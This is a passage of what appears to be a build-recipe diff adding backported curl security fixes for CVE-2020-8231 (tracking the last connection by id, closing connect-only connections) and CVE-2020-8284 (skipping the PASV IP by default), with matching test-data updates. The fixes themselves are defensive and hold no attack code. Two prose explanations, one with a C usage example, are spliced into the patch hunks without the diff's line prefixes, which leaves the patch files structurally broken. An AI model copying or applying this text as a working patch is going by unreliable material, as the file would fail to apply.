++void Curl_detach_connnection(struct Curl_easy *data)
+ {
+ struct connectdata *conn = data->conn;
+ if(conn)
+@@ -834,7 +839,11 @@ static void detach_connnection(struct Curl_easy *data)
+ data->conn = NULL;
+ }
+
+-/* This is the only function that should assign data->conn */
++/*
++ * Curl_attach_connnection() attaches this transfer to this connection.
++ *
++ * This is the only function that should assign data->conn
++ */
+ void Curl_attach_connnection(struct Curl_easy *data,
+ struct connectdata *conn)
+ {
+@@ -1536,19 +1545,6 @@ static CURLMcode multi_runsingle(struct Curl_multi *multi,
+ bool stream_error = FALSE;
+ rc = CURLM_OK;
+
+- DEBUGASSERT((data->mstate <= CURLM_STATE_CONNECT) ||
+- (data->mstate >= CURLM_STATE_DONE) ||
+- data->conn);
+- if(!data->conn &&
+- data->mstate > CURLM_STATE_CONNECT &&
+- data->mstate < CURLM_STATE_DONE) {
+- /* In all these states, the code will blindly access 'data->conn'
+- so this is precaution that it isn't NULL. And it silences static
+- analyzers. */
+- failf(data, "In state %d with no conn, bail out!\n", data->mstate);
+- return CURLM_INTERNAL_ERROR;
+- }
+-
+ if(multi_ischanged(multi, TRUE)) {
+ DEBUGF(infof(data, "multi changed, check CONNECT_PEND queue!\n"));
+ process_pending_handles(multi); /* multiplexed */
+@@ -2231,8 +2227,7 @@ static CURLMcode multi_runsingle(struct Curl_multi *multi,
+ * access free'd data, if the connection is free'd and the handle
+ * removed before we perform the processing in CURLM_STATE_COMPLETED
+ */
+- if(data->conn)
+- detach_connnection(data);
++ Curl_detach_connnection(data);
+ }
+
+ #ifndef CURL_DISABLE_FTP
+@@ -2284,7 +2279,10 @@ static CURLMcode multi_runsingle(struct Curl_multi *multi,
+ /* This is where we make sure that the conn pointer is reset.
+ We don't have to do this in every case block above where a
+ failure is detected */
+- detach_connnection(data);
++ Curl_detach_connnection(data);
++
++ /* remove connection from cache */
++ Curl_conncache_remove_conn(data, conn, TRUE);
+
+ /* disconnect properly */
+ Curl_disconnect(data, conn, dead_connection);
+diff --git a/lib/multiif.h b/lib/multiif.h
+index bde755e..c07587b 100644
+--- a/lib/multiif.h
++++ b/lib/multiif.h
+@@ -33,6 +33,7 @@ void Curl_expire_done(struct Curl_easy *data, expire_id id);
+ void Curl_update_timer(struct Curl_multi *multi);
+ void Curl_attach_connnection(struct Curl_easy *data,
+ struct connectdata *conn);
++void Curl_detach_connnection(struct Curl_easy *data);
+ bool Curl_multiplex_wanted(const struct Curl_multi *multi);
+ void Curl_set_in_callback(struct Curl_easy *data, bool value);
+ bool Curl_is_in_callback(struct Curl_easy *easy);
+diff --git a/lib/url.c b/lib/url.c
+index a826f8a..4ed0623 100644
+--- a/lib/url.c
++++ b/lib/url.c
+@@ -679,9 +679,7 @@ static void conn_reset_all_postponed_data(struct connectdata *conn)
+
+ static void conn_shutdown(struct connectdata *conn)
+ {
+- if(!conn)
+- return;
+-
++ DEBUGASSERT(conn);
+ infof(conn->data, "Closing connection %ld\n", conn->connection_id);
+ DEBUGASSERT(conn->data);
+
+@@ -702,16 +700,11 @@ static void conn_shutdown(struct connectdata *conn)
+ Curl_closesocket(conn, conn->tempsock[0]);
+ if(CURL_SOCKET_BAD != conn->tempsock[1])
+ Curl_closesocket(conn, conn->tempsock[1]);
+-
+- /* unlink ourselves. this should be called last since other shutdown
+- procedures need a valid conn->data and this may clear it. */
+- Curl_conncache_remove_conn(conn->data, conn, TRUE);
+ }
+
+ static void conn_free(struct connectdata *conn)
+ {
+- if(!conn)
+- return;
++ DEBUGASSERT(conn);
+
+ Curl_free_idnconverted_hostname(&conn->host);
+ Curl_free_idnconverted_hostname(&conn->conn_to_host);
+@@ -778,13 +771,17 @@ static void conn_free(struct connectdata *conn)
+ CURLcode Curl_disconnect(struct Curl_easy *data,
+ struct connectdata *conn, bool dead_connection)
+ {
+- if(!conn)
+- return CURLE_OK; /* this is closed and fine already */
++ /* there must be a connection to close */
++ DEBUGASSERT(conn);
+
+- if(!data) {
+- DEBUGF(infof(data, "DISCONNECT without easy handle, ignoring\n"));
+- return CURLE_OK;
+- }
++ /* it must be removed from the connection cache */
++ DEBUGASSERT(!conn->bundle);
++
++ /* there must be an associated transfer */
++ DEBUGASSERT(data);
++
++ /* the transfer must be detached from the connection */
++ DEBUGASSERT(!data->conn);
+
+ /*
+ * If this connection isn't marked to force-close, leave it open if there
+@@ -800,16 +797,11 @@ CURLcode Curl_disconnect(struct Curl_easy *data,
+ conn->dns_entry = NULL;
+ }
+
+- Curl_hostcache_prune(data); /* kill old DNS cache entries */
+-
+-#if !defined(CURL_DISABLE_HTTP) && defined(USE_NTLM)
+ /* Cleanup NTLM connection-related data */
+ Curl_http_auth_cleanup_ntlm(conn);
+-#endif
+-#if !defined(CURL_DISABLE_HTTP) && defined(USE_SPNEGO)
++
+ /* Cleanup NEGOTIATE connection-related data */
+ Curl_http_auth_cleanup_negotiate(conn);
+-#endif
+
+ /* the protocol specific disconnect handler and conn_shutdown need a transfer
+ for the connection! */
+@@ -1006,8 +998,12 @@ static int call_extract_if_dead(struct connectdata *conn, void *param)
+ static void prune_dead_connections(struct Curl_easy *data)
+ {
+ struct curltime now = Curl_now();
+- timediff_t elapsed =
++ timediff_t elapsed;
++
++ CONNCACHE_LOCK(data);
++ elapsed =
+ Curl_timediff(now, data->state.conn_cache->last_cleanup);
++ CONNCACHE_UNLOCK(data);
+
+ if(elapsed >= 1000L) {
+ struct prunedead prune;
+@@ -1015,10 +1011,17 @@ static void prune_dead_connections(struct Curl_easy *data)
+ prune.extracted = NULL;
+ while(Curl_conncache_foreach(data, data->state.conn_cache, &prune,
+ call_extract_if_dead)) {
++ /* unlocked */
++
++ /* remove connection from cache */
++ Curl_conncache_remove_conn(data, prune.extracted, TRUE);
++
+ /* disconnect it */
+ (void)Curl_disconnect(data, prune.extracted, /* dead_connection */TRUE);
+ }
++ CONNCACHE_LOCK(data);
+ data->state.conn_cache->last_cleanup = now;
++ CONNCACHE_UNLOCK(data);
+ }
+ }
+
+@@ -1078,7 +1081,7 @@ ConnectionExists(struct Curl_easy *data,
+ if(data->set.pipewait) {
+ infof(data, "Server doesn't support multiplex yet, wait\n");
+ *waitpipe = TRUE;
+- Curl_conncache_unlock(data);
++ CONNCACHE_UNLOCK(data);
+ return FALSE; /* no re-use */
+ }
+
+@@ -1402,11 +1405,12 @@ ConnectionExists(struct Curl_easy *data,
+ if(chosen) {
+ /* mark it as used before releasing the lock */
+ chosen->data = data; /* own it! */
+- Curl_conncache_unlock(data);
++ Curl_attach_connnection(data, chosen);
++ CONNCACHE_UNLOCK(data);
+ *usethis = chosen;
+ return TRUE; /* yes, we found one to use! */
+ }
+- Curl_conncache_unlock(data);
++ CONNCACHE_UNLOCK(data);
+
+ if(foundPendingCandidate && data->set.pipewait) {
+ infof(data,
+@@ -3519,6 +3523,7 @@ static CURLcode create_conn(struct Curl_easy *data,
+ if(!result) {
+ conn->bits.tcpconnect[FIRSTSOCKET] = TRUE; /* we are "connected */
+
++ Curl_attach_connnection(data, conn);
+ result = Curl_conncache_add_conn(data->state.conn_cache, conn);
+ if(result)
+ goto out;
+@@ -3533,7 +3538,6 @@ static CURLcode create_conn(struct Curl_easy *data,
+ (void)conn->handler->done(conn, result, FALSE);
+ goto out;
+ }
+- Curl_attach_connnection(data, conn);
+ Curl_setup_transfer(data, -1, -1, FALSE, -1);
+ }
+
+@@ -3683,7 +3687,7 @@ static CURLcode create_conn(struct Curl_easy *data,
+
+ /* The bundle is full. Extract the oldest connection. */
+ conn_candidate = Curl_conncache_extract_bundle(data, bundle);
+- Curl_conncache_unlock(data);
++ CONNCACHE_UNLOCK(data);
+
+ if(conn_candidate)
+ (void)Curl_disconnect(data, conn_candidate,
+@@ -3695,7 +3699,7 @@ static CURLcode create_conn(struct Curl_easy *data,
+ }
+ }
+ else
+- Curl_conncache_unlock(data);
++ CONNCACHE_UNLOCK(data);
+
+ }
+
+@@ -3729,6 +3733,8 @@ static CURLcode create_conn(struct Curl_easy *data,
+ * This is a brand new connection, so let's store it in the connection
+ * cache of ours!
+ */
++ Curl_attach_connnection(data, conn);
++
+ result = Curl_conncache_add_conn(data->state.conn_cache, conn);
+ if(result)
+ goto out;
+@@ -3883,7 +3889,7 @@ CURLcode Curl_connect(struct Curl_easy *data,
+ result = create_conn(data, &conn, asyncp);
+
+ if(!result) {
+- if(CONN_INUSE(conn))
++ if(CONN_INUSE(conn) > 1)
+ /* multiplexed */
+ *protocol_done = TRUE;
+ else if(!*asyncp) {
+@@ -3900,11 +3906,10 @@ CURLcode Curl_connect(struct Curl_easy *data,
+ else if(result && conn) {
+ /* We're not allowed to return failure with memory left allocated in the
+ connectdata struct, free those here */
++ Curl_detach_connnection(data);
++ Curl_conncache_remove_conn(data, conn, TRUE);
+ Curl_disconnect(data, conn, TRUE);
+ }
+- else if(!result && !data->conn)
+- /* FILE: transfers already have the connection attached */
+- Curl_attach_connnection(data, conn);
+
+ return result;
+ }
+diff --git a/tests/data/test1554 b/tests/data/test1554
+index 06f1897..d3926d9 100644
+--- a/tests/data/test1554
++++ b/tests/data/test1554
+@@ -29,6 +29,12 @@ run 1: foobar and so on fun!
+ <- Mutex unlock
+ -> Mutex lock
+ <- Mutex unlock
++-> Mutex lock
++<- Mutex unlock
++-> Mutex lock
++<- Mutex unlock
++-> Mutex lock
++<- Mutex unlock
+ run 1: foobar and so on fun!
+ -> Mutex lock
+ <- Mutex unlock
+@@ -40,6 +46,10 @@ run 1: foobar and so on fun!
+ <- Mutex unlock
+ -> Mutex lock
+ <- Mutex unlock
++-> Mutex lock
++<- Mutex unlock
++-> Mutex lock
++<- Mutex unlock
+ run 1: foobar and so on fun!
+ -> Mutex lock
+ <- Mutex unlock
+@@ -51,6 +61,10 @@ run 1: foobar and so on fun!
+ <- Mutex unlock
+ -> Mutex lock
+ <- Mutex unlock
++-> Mutex lock
++<- Mutex unlock
++-> Mutex lock
++<- Mutex unlock
+ run 1: foobar and so on fun!
+ -> Mutex lock
+ <- Mutex unlock
+diff --git a/tests/unit/unit1620.c b/tests/unit/unit1620.c
+index 6e572c6..b23e5b9 100644
+--- a/tests/unit/unit1620.c
++++ b/tests/unit/unit1620.c
+@@ -5,7 +5,7 @@
+ * | (__| |_| | _ <| |___
+ * \___|\___/|_| \_\_____|
+ *
+- * Copyright (C) 1998 - 2019, Daniel Stenberg, <daniel@haxx.se>, et al.
++ * Copyright (C) 1998 - 2020, Daniel Stenberg, <daniel@haxx.se>, et al.
+ *
+ * This software is licensed as described in the file COPYING, which
+ * you should have received as part of this distribution. The terms
+@@ -73,10 +73,6 @@ UNITTEST_START
+ fail_unless(rc == CURLE_OK,
+ "Curl_parse_login_details() failed");
+
+- rc = Curl_disconnect(empty, empty->conn, FALSE);
+- fail_unless(rc == CURLE_OK,
+- "Curl_disconnect() with dead_connection set FALSE failed");
+-
+ Curl_freeset(empty);
+ for(i = (enum dupstring)0; i < STRING_LAST; i++) {
+ fail_unless(empty->set.str[i] == NULL,
+--
+2.25.4
+
+
+From 6830828c9eecd9ab14404f2f49f19b56dec62130 Mon Sep 17 00:00:00 2001
+From: Marc Aldorasi <marc@groundctl.com>
+Date: Thu, 30 Jul 2020 14:16:17 -0400
+Subject: [PATCH 2/3] multi_remove_handle: close unused connect-only
+ connections
+
+Previously any connect-only connections in a multi handle would be kept
+alive until the multi handle was closed. Since these connections cannot
+be re-used, they can be marked for closure when the associated easy
+handle is removed from the multi handle.
+
+Closes #5749
+
+Upstream-commit: d5bb459ccf1fc5980ae4b95c05b4ecf6454a7599
+Signed-off-by: Kamil Dudka <kdudka@redhat.com>
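
To make the scenario concrete, here is a minimal, illustrative sketch (not part of the patch; the URL and the busy-wait loop are placeholder choices) of a connect-only easy handle driven by a multi handle. After this change, curl_multi_remove_handle() marks such a connection for closure instead of leaving it cached until curl_multi_cleanup():

    #include <curl/curl.h>

    int main(void)
    {
      CURL *easy;
      CURLM *multi;
      int running = 1;

      curl_global_init(CURL_GLOBAL_DEFAULT);
      easy = curl_easy_init();
      multi = curl_multi_init();

      curl_easy_setopt(easy, CURLOPT_URL, "https://example.com/");
      curl_easy_setopt(easy, CURLOPT_CONNECT_ONLY, 1L); /* connect, no transfer */

      curl_multi_add_handle(multi, easy);
      while(running)
        curl_multi_perform(multi, &running); /* sketch only: no waiting/polling */

      /* The connect-only connection cannot be re-used by other handles, so it
         is now flagged for closure here rather than lingering in the cache. */
      curl_multi_remove_handle(multi, easy);

      curl_easy_cleanup(easy);
      curl_multi_cleanup(multi);
      curl_global_cleanup();
      return 0;
    }
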
+---
+ lib/multi.c | 34 ++++++++++++++++++++++++++++++----
+ tests/data/test1554 | 6 ++++++
+ 2 files changed, 36 insertions(+), 4 deletions(-)
+
+diff --git a/lib/multi.c b/lib/multi.c
+index 249e360..f1371bd 100644
+--- a/lib/multi.c
++++ b/lib/multi.c
+@@ -682,6 +682,26 @@ static CURLcode multi_done(struct Curl_easy *data,
+ return result;
+ }
+
++static int close_connect_only(struct connectdata *conn, void *param)
++{
++ struct Curl_easy *data = param;
++
++ if(data->state.lastconnect != conn)
++ return 0;
++
++ if(conn->data != data)
++ return 1;
++ conn->data = NULL;
++
++ if(!conn->bits.connect_only)
++ return 1;
++
++ connclose(conn, "Removing connect-only easy handle");
++ conn->bits.connect_only = FALSE;
++
++ return 1;
++}
++
+ CURLMcode curl_multi_remove_handle(struct Curl_multi *multi,
+ struct Curl_easy *data)
+ {
+@@ -765,10 +785,6 @@ CURLMcode curl_multi_remove_handle(struct Curl_multi *multi,
+ multi_done() as that may actually call Curl_expire that uses this */
+ Curl_llist_destroy(&data->state.timeoutlist, NULL);
+
+- /* as this was using a shared connection cache we clear the pointer to that
+- since we're not part of that multi handle anymore */
+- data->state.conn_cache = NULL;
+-
+ /* change state without using multistate(), only to make singlesocket() do
+ what we want */
+ data->mstate = CURLM_STATE_COMPLETED;
+@@ -778,12 +794,22 @@ CURLMcode curl_multi_remove_handle(struct Curl_multi *multi,
+ /* Remove the association between the connection and the handle */
+ Curl_detach_connnection(data);
+
++ if(data->state.lastconnect) {
++ /* Mark any connect-only connection for closure */
++ Curl_conncache_foreach(data, data->state.conn_cache,
++ data, &close_connect_only);
++ }
++
+ #ifdef USE_LIBPSL
+ /* Remove the PSL association. */
+ if(data->psl == &multi->psl)
+ data->psl = NULL;
+ #endif
+
++ /* as this was using a shared connection cache we clear the pointer to that
++ since we're not part of that multi handle anymore */
++ data->state.conn_cache = NULL;
++
+ data->multi = NULL; /* clear the association to this multi handle */
+
+ /* make sure there's no pending message in the queue sent from this easy
+diff --git a/tests/data/test1554 b/tests/data/test1554
+index d3926d9..fffa6ad 100644
+--- a/tests/data/test1554
++++ b/tests/data/test1554
+@@ -50,6 +50,8 @@ run 1: foobar and so on fun!
+ <- Mutex unlock
+ -> Mutex lock
+ <- Mutex unlock
++-> Mutex lock
++<- Mutex unlock
+ run 1: foobar and so on fun!
+ -> Mutex lock
+ <- Mutex unlock
+@@ -65,6 +67,8 @@ run 1: foobar and so on fun!
+ <- Mutex unlock
+ -> Mutex lock
+ <- Mutex unlock
++-> Mutex lock
++<- Mutex unlock
+ run 1: foobar and so on fun!
+ -> Mutex lock
+ <- Mutex unlock
+@@ -74,6 +78,8 @@ run 1: foobar and so on fun!
+ <- Mutex unlock
+ -> Mutex lock
+ <- Mutex unlock
++-> Mutex lock
++<- Mutex unlock
+ </datacheck>
+ </reply>
+
+--
+2.25.4
+
+
+From 01148ee40dd913a169435b0f9ea90e6393821e70 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Sun, 16 Aug 2020 11:34:35 +0200
+Subject: [PATCH 3/3] Curl_easy: remember last connection by id, not by pointer
+
+CVE-2020-8231
+
+Bug: https://curl.haxx.se/docs/CVE-2020-8231.html
+
+Reported-by: Marc Aldorasi
+Closes #5824
+
+Upstream-commit: 3c9e021f86872baae412a427e807fbfa2f3e8a22
+Signed-off-by: Kamil Dudka <kdudka@redhat.com>
+---
+ lib/connect.c | 19 ++++++++++---------
+ lib/easy.c | 3 +--
+ lib/multi.c | 9 +++++----
+ lib/url.c | 2 +-
+ lib/urldata.h | 2 +-
+ 5 files changed, 18 insertions(+), 17 deletions(-)
+
+diff --git a/lib/connect.c b/lib/connect.c
+index 29293f0..e1c5662 100644
+--- a/lib/connect.c
++++ b/lib/connect.c
+@@ -1356,15 +1356,15 @@ CURLcode Curl_connecthost(struct connectdata *conn, /* context */
+ }
+
+ struct connfind {
+- struct connectdata *tofind;
+- bool found;
++ long id_tofind;
++ struct connectdata *found;
+ };
+
+ static int conn_is_conn(struct connectdata *conn, void *param)
+ {
+ struct connfind *f = (struct connfind *)param;
+- if(conn == f->tofind) {
+- f->found = TRUE;
++ if(conn->connection_id == f->id_tofind) {
++ f->found = conn;
+ return 1;
+ }
+ return 0;
+@@ -1386,21 +1386,22 @@ curl_socket_t Curl_getconnectinfo(struct Curl_easy *data,
+ * - that is associated with a multi handle, and whose connection
+ * was detached with CURLOPT_CONNECT_ONLY
+ */
+- if(data->state.lastconnect && (data->multi_easy || data->multi)) {
+- struct connectdata *c = data->state.lastconnect;
++ if((data->state.lastconnect_id != -1) && (data->multi_easy || data->multi)) {
++ struct connectdata *c;
+ struct connfind find;
+- find.tofind = data->state.lastconnect;
+- find.found = FALSE;
++ find.id_tofind = data->state.lastconnect_id;
++ find.found = NULL;
+
+ Curl_conncache_foreach(data, data->multi_easy?
+ &data->multi_easy->conn_cache:
+ &data->multi->conn_cache, &find, conn_is_conn);
+
+ if(!find.found) {
+- data->state.lastconnect = NULL;
++ data->state.lastconnect_id = -1;
+ return CURL_SOCKET_BAD;
+ }
+
++ c = find.found;
+ if(connp) {
+ /* only store this if the caller cares for it */
+ *connp = c;
+diff --git a/lib/easy.c b/lib/easy.c
+index 292cca7..a69eb9e 100644
+--- a/lib/easy.c
++++ b/lib/easy.c
+@@ -831,8 +831,7 @@ struct Curl_easy *curl_easy_duphandle(struct Curl_easy *data)
+
+ /* the connection cache is setup on demand */
+ outcurl->state.conn_cache = NULL;
+-
+- outcurl->state.lastconnect = NULL;
++ outcurl->state.lastconnect_id = -1;
+
+ outcurl->progress.flags = data->progress.flags;
+ outcurl->progress.callback = data->progress.callback;
+diff --git a/lib/multi.c b/lib/multi.c
+index f1371bd..778c537 100644
+--- a/lib/multi.c
++++ b/lib/multi.c
+@@ -453,6 +453,7 @@ CURLMcode curl_multi_add_handle(struct Curl_multi *multi,
+ data->state.conn_cache = &data->share->conn_cache;
+ else
+ data->state.conn_cache = &multi->conn_cache;
++ data->state.lastconnect_id = -1;
+
+ #ifdef USE_LIBPSL
+ /* Do the same for PSL. */
+@@ -671,11 +672,11 @@ static CURLcode multi_done(struct Curl_easy *data,
+ CONNCACHE_UNLOCK(data);
+ if(Curl_conncache_return_conn(data, conn)) {
+ /* remember the most recently used connection */
+- data->state.lastconnect = conn;
++ data->state.lastconnect_id = conn->connection_id;
+ infof(data, "%s\n", buffer);
+ }
+ else
+- data->state.lastconnect = NULL;
++ data->state.lastconnect_id = -1;
+ }
+
+ Curl_free_request_state(data);
+@@ -686,7 +687,7 @@ static int close_connect_only(struct connectdata *conn, void *param)
+ {
+ struct Curl_easy *data = param;
+
+- if(data->state.lastconnect != conn)
++ if(data->state.lastconnect_id != conn->connection_id)
+ return 0;
+
+ if(conn->data != data)
+@@ -794,7 +795,7 @@ CURLMcode curl_multi_remove_handle(struct Curl_multi *multi,
+ /* Remove the association between the connection and the handle */
+ Curl_detach_connnection(data);
+
+- if(data->state.lastconnect) {
++ if(data->state.lastconnect_id != -1) {
+ /* Mark any connect-only connection for closure */
+ Curl_conncache_foreach(data, data->state.conn_cache,
+ data, &close_connect_only);
+diff --git a/lib/url.c b/lib/url.c
+index a1a6b69..2919a3d 100644
+--- a/lib/url.c
++++ b/lib/url.c
+@@ -617,7 +617,7 @@ CURLcode Curl_open(struct Curl_easy **curl)
+ Curl_initinfo(data);
+
+ /* most recent connection is not yet defined */
+- data->state.lastconnect = NULL;
++ data->state.lastconnect_id = -1;
+
+ data->progress.flags |= PGRS_HIDE;
+ data->state.current_speed = -1; /* init to negative == impossible */
+diff --git a/lib/urldata.h b/lib/urldata.h
+index f80a02d..6d8eb69 100644
+--- a/lib/urldata.h
++++ b/lib/urldata.h
+@@ -1332,7 +1332,7 @@ struct UrlState {
+ /* buffers to store authentication data in, as parsed from input options */
+ struct curltime keeps_speed; /* for the progress meter really */
+
+- struct connectdata *lastconnect; /* The last connection, NULL if undefined */
++ long lastconnect_id; /* The last connection, -1 if undefined */
+
+ char *headerbuff; /* allocated buffer to store headers in */
+ size_t headersize; /* size of the allocation */
+--
+2.25.4
+
diff --git a/meta/recipes-support/curl/curl/CVE-2020-8284.patch b/meta/recipes-support/curl/curl/CVE-2020-8284.patch
new file mode 100644
index 0000000000..ed6e8049a6
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2020-8284.patch
@@ -0,0 +1,209 @@
+From ec9cc725d598ac77de7b6df8afeec292b3c8ad46 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Tue, 24 Nov 2020 14:56:57 +0100
+Subject: [PATCH] ftp: CURLOPT_FTP_SKIP_PASV_IP by default
+
+The command line tool also independently sets --ftp-skip-pasv-ip by
+default.
+
+Ten test cases updated to adapt the modified --libcurl output.
+
+Bug: https://curl.se/docs/CVE-2020-8284.html
+CVE-2020-8284
+
+Reported-by: Varnavas Papaioannou
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/ec9cc725d598ac]
+CVE: CVE-2020-8284
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
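
As a usage illustration (not part of the patch; the FTP URL is a placeholder), applications can still set the option explicitly in either direction now that the library default flips to enabled:

    #include <curl/curl.h>

    int main(void)
    {
      CURL *curl = curl_easy_init();
      if(curl) {
        curl_easy_setopt(curl, CURLOPT_URL, "ftp://ftp.example.com/file.txt");
        /* 1L (the new default) ignores the IP address in the server's 227
           reply and re-uses the control connection's address for the data
           connection; 0L restores the pre-7.74.0 behaviour. */
        curl_easy_setopt(curl, CURLOPT_FTP_SKIP_PASV_IP, 0L);
        curl_easy_perform(curl);
        curl_easy_cleanup(curl);
      }
      return 0;
    }
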
+
+---
+ docs/cmdline-opts/ftp-skip-pasv-ip.d | 2 ++
+ docs/libcurl/opts/CURLOPT_FTP_SKIP_PASV_IP.3 | 8 +++++---
+ lib/url.c | 1 +
+ src/tool_cfgable.c | 1 +
+ tests/data/test1400 | 1 +
+ tests/data/test1401 | 1 +
+ tests/data/test1402 | 1 +
+ tests/data/test1403 | 1 +
+ tests/data/test1404 | 1 +
+ tests/data/test1405 | 1 +
+ tests/data/test1406 | 1 +
+ tests/data/test1407 | 1 +
+ tests/data/test1420 | 1 +
+ 14 files changed, 18 insertions(+), 3 deletions(-)
+
+diff --git a/docs/cmdline-opts/ftp-skip-pasv-ip.d b/docs/cmdline-opts/ftp-skip-pasv-ip.d
+index d6fd4589b1e..bcf4e7e62f2 100644
+--- a/docs/cmdline-opts/ftp-skip-pasv-ip.d
++++ b/docs/cmdline-opts/ftp-skip-pasv-ip.d
+@@ -10,4 +10,6 @@ to curl's PASV command when curl connects the data connection. Instead curl
+ will re-use the same IP address it already uses for the control
+ connection.
+
++Since curl 7.74.0 this option is enabled by default.
++
+ This option has no effect if PORT, EPRT or EPSV is used instead of PASV.
+diff --git a/docs/libcurl/opts/CURLOPT_FTP_SKIP_PASV_IP.3 b/docs/libcurl/opts/CURLOPT_FTP_SKIP_PASV_IP.3
+index d6217d0d8ca..fa87ddce769 100644
+--- a/docs/libcurl/opts/CURLOPT_FTP_SKIP_PASV_IP.3
++++ b/docs/libcurl/opts/CURLOPT_FTP_SKIP_PASV_IP.3
+@@ -5,7 +5,7 @@
+ .\" * | (__| |_| | _ <| |___
+ .\" * \___|\___/|_| \_\_____|
+ .\" *
+-.\" * Copyright (C) 1998 - 2017, Daniel Stenberg, <daniel@haxx.se>, et al.
++.\" * Copyright (C) 1998 - 2020, Daniel Stenberg, <daniel@haxx.se>, et al.
+ .\" *
+ .\" * This software is licensed as described in the file COPYING, which
+ .\" * you should have received as part of this distribution. The terms
+@@ -35,11 +35,13 @@ address it already uses for the control connection. But it will use the port
+ number from the 227-response.
+
+ This option thus allows libcurl to work around broken server installations
+-that due to NATs, firewalls or incompetence report the wrong IP address back.
++that due to NATs, firewalls or incompetence report the wrong IP address
++back. Setting the option also reduces the risk for various sorts of client
++abuse by malicious servers.
+
+ This option has no effect if PORT, EPRT or EPSV is used instead of PASV.
+ .SH DEFAULT
+-0
++1 since 7.74.0, was 0 before then.
+ .SH PROTOCOLS
+ FTP
+ .SH EXAMPLE
+diff --git a/lib/url.c b/lib/url.c
+index f8b2a0030de..2b0ba87ba87 100644
+--- a/lib/url.c
++++ b/lib/url.c
+@@ -497,6 +497,7 @@ CURLcode Curl_init_userdefined(struct Curl_easy *data)
+ set->ftp_use_eprt = TRUE; /* FTP defaults to EPRT operations */
+ set->ftp_use_pret = FALSE; /* mainly useful for drftpd servers */
+ set->ftp_filemethod = FTPFILE_MULTICWD;
++ set->ftp_skip_ip = TRUE; /* skip PASV IP by default */
+ #endif
+ set->dns_cache_timeout = 60; /* Timeout every 60 seconds by default */
+
+diff --git a/src/tool_cfgable.c b/src/tool_cfgable.c
+index c52d8e1c6bb..4c06d3557b7 100644
+--- a/src/tool_cfgable.c
++++ b/src/tool_cfgable.c
+@@ -44,6 +44,7 @@ void config_init(struct OperationConfig *config)
+ config->tcp_nodelay = TRUE; /* enabled by default */
+ config->happy_eyeballs_timeout_ms = CURL_HET_DEFAULT;
+ config->http09_allowed = FALSE;
++ config->ftp_skip_ip = TRUE;
+ }
+
+ static void free_config_fields(struct OperationConfig *config)
+diff --git a/tests/data/test1400 b/tests/data/test1400
+index 812ad0b88d9..b7060eca58e 100644
+--- a/tests/data/test1400
++++ b/tests/data/test1400
+@@ -73,6 +73,7 @@ int main(int argc, char *argv[])
+ curl_easy_setopt(hnd, CURLOPT_USERAGENT, "stripped");
+ curl_easy_setopt(hnd, CURLOPT_MAXREDIRS, 50L);
+ curl_easy_setopt(hnd, CURLOPT_VERBOSE, 1L);
++ curl_easy_setopt(hnd, CURLOPT_FTP_SKIP_PASV_IP, 1L);
+ curl_easy_setopt(hnd, CURLOPT_TCP_KEEPALIVE, 1L);
+
+ /* Here is a list of options the curl code used that cannot get generated
+diff --git a/tests/data/test1401 b/tests/data/test1401
+index f93b3d637de..a2629683aff 100644
+--- a/tests/data/test1401
++++ b/tests/data/test1401
+@@ -87,6 +87,7 @@ int main(int argc, char *argv[])
+ curl_easy_setopt(hnd, CURLOPT_MAXREDIRS, 50L);
+ curl_easy_setopt(hnd, CURLOPT_COOKIE, "chocolate=chip");
+ curl_easy_setopt(hnd, CURLOPT_VERBOSE, 1L);
++ curl_easy_setopt(hnd, CURLOPT_FTP_SKIP_PASV_IP, 1L);
+ curl_easy_setopt(hnd, CURLOPT_TCP_KEEPALIVE, 1L);
+ curl_easy_setopt(hnd, CURLOPT_PROTOCOLS, (long)CURLPROTO_FILE |
+ (long)CURLPROTO_FTP |
+diff --git a/tests/data/test1402 b/tests/data/test1402
+index 7593c516da1..1bd55cb4e3b 100644
+--- a/tests/data/test1402
++++ b/tests/data/test1402
+@@ -78,6 +78,7 @@ int main(int argc, char *argv[])
+ curl_easy_setopt(hnd, CURLOPT_USERAGENT, "stripped");
+ curl_easy_setopt(hnd, CURLOPT_MAXREDIRS, 50L);
+ curl_easy_setopt(hnd, CURLOPT_VERBOSE, 1L);
++ curl_easy_setopt(hnd, CURLOPT_FTP_SKIP_PASV_IP, 1L);
+ curl_easy_setopt(hnd, CURLOPT_TCP_KEEPALIVE, 1L);
+
+ /* Here is a list of options the curl code used that cannot get generated
+diff --git a/tests/data/test1403 b/tests/data/test1403
+index ecb4dd3dcab..a7c9fcca322 100644
+--- a/tests/data/test1403
++++ b/tests/data/test1403
+@@ -73,6 +73,7 @@ int main(int argc, char *argv[])
+ curl_easy_setopt(hnd, CURLOPT_USERAGENT, "stripped");
+ curl_easy_setopt(hnd, CURLOPT_MAXREDIRS, 50L);
+ curl_easy_setopt(hnd, CURLOPT_VERBOSE, 1L);
++ curl_easy_setopt(hnd, CURLOPT_FTP_SKIP_PASV_IP, 1L);
+ curl_easy_setopt(hnd, CURLOPT_TCP_KEEPALIVE, 1L);
+
+ /* Here is a list of options the curl code used that cannot get generated
+diff --git a/tests/data/test1404 b/tests/data/test1404
+index 97622b63948..1d8e8cf7779 100644
+--- a/tests/data/test1404
++++ b/tests/data/test1404
+@@ -147,6 +147,7 @@ int main(int argc, char *argv[])
+ curl_easy_setopt(hnd, CURLOPT_USERAGENT, "stripped");
+ curl_easy_setopt(hnd, CURLOPT_MAXREDIRS, 50L);
+ curl_easy_setopt(hnd, CURLOPT_VERBOSE, 1L);
++ curl_easy_setopt(hnd, CURLOPT_FTP_SKIP_PASV_IP, 1L);
+ curl_easy_setopt(hnd, CURLOPT_TCP_KEEPALIVE, 1L);
+
+ /* Here is a list of options the curl code used that cannot get generated
+diff --git a/tests/data/test1405 b/tests/data/test1405
+index 2bac79eda74..b4087704f7b 100644
+--- a/tests/data/test1405
++++ b/tests/data/test1405
+@@ -89,6 +89,7 @@ int main(int argc, char *argv[])
+ curl_easy_setopt(hnd, CURLOPT_POSTQUOTE, slist2);
+ curl_easy_setopt(hnd, CURLOPT_PREQUOTE, slist3);
+ curl_easy_setopt(hnd, CURLOPT_VERBOSE, 1L);
++ curl_easy_setopt(hnd, CURLOPT_FTP_SKIP_PASV_IP, 1L);
+ curl_easy_setopt(hnd, CURLOPT_TCP_KEEPALIVE, 1L);
+
